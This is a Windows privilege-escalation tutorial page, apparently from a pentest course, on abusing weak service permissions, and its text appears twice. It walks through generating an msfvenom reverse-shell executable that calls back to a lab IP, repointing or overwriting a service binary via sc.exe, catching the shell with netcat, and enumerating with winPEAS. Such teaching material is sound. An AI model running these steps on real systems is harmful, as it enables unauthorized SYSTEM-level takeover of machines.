7 - Weak Service Permissions

Topics

Introduction to the Windows Shells
Windows Permissions
Reverse Shells in Windows
SeImpersonatePrivilege Exploitation
On Cross Compilation
Windows Services
Weak Service Permissions
Unquoted Service Path
DLL Hijacking
Always Install Elevated
Files with Sensitive Data
Windows Hashes
Stored Credentials and the Windows Vault
Scheduled Task
Critical Registry Paths
Useful Tools
AMSI Bypass

Weak Permissions on Service Configuration

Weak service configurations and binaries present significant security risks, infact service configurations can be altered if a user or group has sufficient permissions.

Viewing Service Configuration

Use the sc.exe command to check a service's configuration:

sc.exe qc SimpleService

Sample Output:

SERVICE_NAME: SimpleService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Quickemu\Downloads\simpleService.exe
        SERVICE_START_NAME : LocalSystem

Checking Permissions with AccessChk

Than, using accesschk64we can verify permissions over a service:

.\accesschk64.exe /accepteula -uwcqv SimpleService

Sample Output:

SimpleService
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS

The output shows the permissions for users/groups. "SERVICE_ALL_ACCESS" indicates full control over the service as System and Administrators user.

After checking the configuration, the goal is to change the path and replace it with the malicious one, stop the service and run it again.

Exploitation Steps

Create a Malicious Executable Generate a reverse shell payload:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe

Modify the Service Executable Path Change the binpath to point to the malicious binary:
```
sc.exe config SimpleService binpath="C:\Users\Quickemu\Downloads\malicious.exe"
```
Go into listening mode with netcat on linux attacker machine (we'll obtain the connection after next step):

nc -lvnp 7777

Restart the Service Restart the service to execute the malicious binary:

sc.exe stop SimpleService
sc.exe start SimpleService

Weak Permissions on Service Binary

If the service binary itself has weak file permissions, it can be overwritten with a malicious executable.

Identifying Service Binaries

List the binary paths of running services:

Get-CimInstance -ClassName win32_service | Select Name, State, PathName | Where-Object {$_.State -like 'Running'}

Checking Binary Permissions with ICACLS

Use the icacls utility to view file permissions:

icacls .\simpleService.exe

Sample Output:

.\simpleService.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    QUICKEM-5QLQQP9\Quickemu:(F)

If the current user has "Full Control" ((F)), they can overwrite the binary.

Exploitation Steps

Generate and Transfer a Malicious Binary

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe

Backup and Replace the Service Binary

cp .\simpleService.exe .\simpleService.exe.bkp
cp .\malicious.exe .\simpleService.exe

Go into listening mode with netcat on linux attacker machine (we'll obtain the connection after next step):

nc -lvnp 7777

Restart the Service

sc.exe stop SimpleService
sc.exe start SimpleService

Service Enumeration with winPEAS

winPEAS is a tool used to enumerate potential misconfigurations, including weak service permissions.

Downloading winPEAS

Download the binary:

wget https://github.com/peass-ng/PEASS-ng/releases/download/20241011-2e37ba11/winPEASx64.exe

Running winPEAS to Enumerate Services

Use the servicesinfo option to gather information about services:

.\winPEASx64.exe quiet servicesinfo

winPEAS will display information about services, including configuration details, permissions, and potential vulnerabilities.

Other Resources

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗

Previous6 - Windows Services Next8 - Unquoted Service Path

Last updated 5 months ago

7 - Weak Service Permissions

Topics

Introduction to the Windows Shells
Windows Permissions
Reverse Shells in Windows
SeImpersonatePrivilege Exploitation
On Cross Compilation
Windows Services
Weak Service Permissions
Unquoted Service Path
DLL Hijacking
Always Install Elevated
Files with Sensitive Data
Windows Hashes
Stored Credentials and the Windows Vault
Scheduled Task
Critical Registry Paths
Useful Tools
AMSI Bypass

Weak Permissions on Service Configuration

Weak service configurations and binaries present significant security risks, infact service configurations can be altered if a user or group has sufficient permissions.

Viewing Service Configuration

Use the sc.exe command to check a service's configuration:

sc.exe qc SimpleService

Sample Output:

SERVICE_NAME: SimpleService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Quickemu\Downloads\simpleService.exe
        SERVICE_START_NAME : LocalSystem

Checking Permissions with AccessChk

is a Microsoft utility that permits to know what kind of accesses specific users or groups have to resources including files, directories, Registry keys, global objects and Windows services. AccessChk quickly answers these questions with an intuitive interface and output. (Download it from )

Than, using accesschk64we can verify permissions over a service:

.\accesschk64.exe /accepteula -uwcqv SimpleService

Sample Output:

SimpleService
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS

The output shows the permissions for users/groups. "SERVICE_ALL_ACCESS" indicates full control over the service as System and Administrators user.

After checking the configuration, the goal is to change the path and replace it with the malicious one, stop the service and run it again.

Exploitation Steps

Create a Malicious Executable Generate a reverse shell payload:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe

Modify the Service Executable Path Change the binpath to point to the malicious binary:
```
sc.exe config SimpleService binpath="C:\Users\Quickemu\Downloads\malicious.exe"
```
Go into listening mode with netcat on linux attacker machine (we'll obtain the connection after next step):

nc -lvnp 7777

Restart the Service Restart the service to execute the malicious binary:

sc.exe stop SimpleService
sc.exe start SimpleService

Weak Permissions on Service Binary

If the service binary itself has weak file permissions, it can be overwritten with a malicious executable.

Identifying Service Binaries

List the binary paths of running services:

Get-CimInstance -ClassName win32_service | Select Name, State, PathName | Where-Object {$_.State -like 'Running'}

Checking Binary Permissions with ICACLS

Use the icacls utility to view file permissions:

icacls .\simpleService.exe

Sample Output:

.\simpleService.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    QUICKEM-5QLQQP9\Quickemu:(F)

If the current user has "Full Control" ((F)), they can overwrite the binary.

Exploitation Steps

Generate and Transfer a Malicious Binary

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe

Backup and Replace the Service Binary

cp .\simpleService.exe .\simpleService.exe.bkp
cp .\malicious.exe .\simpleService.exe

Go into listening mode with netcat on linux attacker machine (we'll obtain the connection after next step):

nc -lvnp 7777

Restart the Service

sc.exe stop SimpleService
sc.exe start SimpleService

Service Enumeration with winPEAS

winPEAS is a tool used to enumerate potential misconfigurations, including weak service permissions.

Downloading winPEAS

Download the binary:

wget https://github.com/peass-ng/PEASS-ng/releases/download/20241011-2e37ba11/winPEASx64.exe

Running winPEAS to Enumerate Services

Use the servicesinfo option to gather information about services:

.\winPEASx64.exe quiet servicesinfo

winPEAS will display information about services, including configuration details, permissions, and potential vulnerabilities.

Other Resources

Windows Privilege Escalation Awesome Scripts:
Weak Service Permissions:
Windows local privilege escalation:
Service Misconfiguration:
Weak Service Permissions:
Insecure Service Permissions:

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗

Previous6 - Windows Services Next8 - Unquoted Service Path

Last updated 5 months ago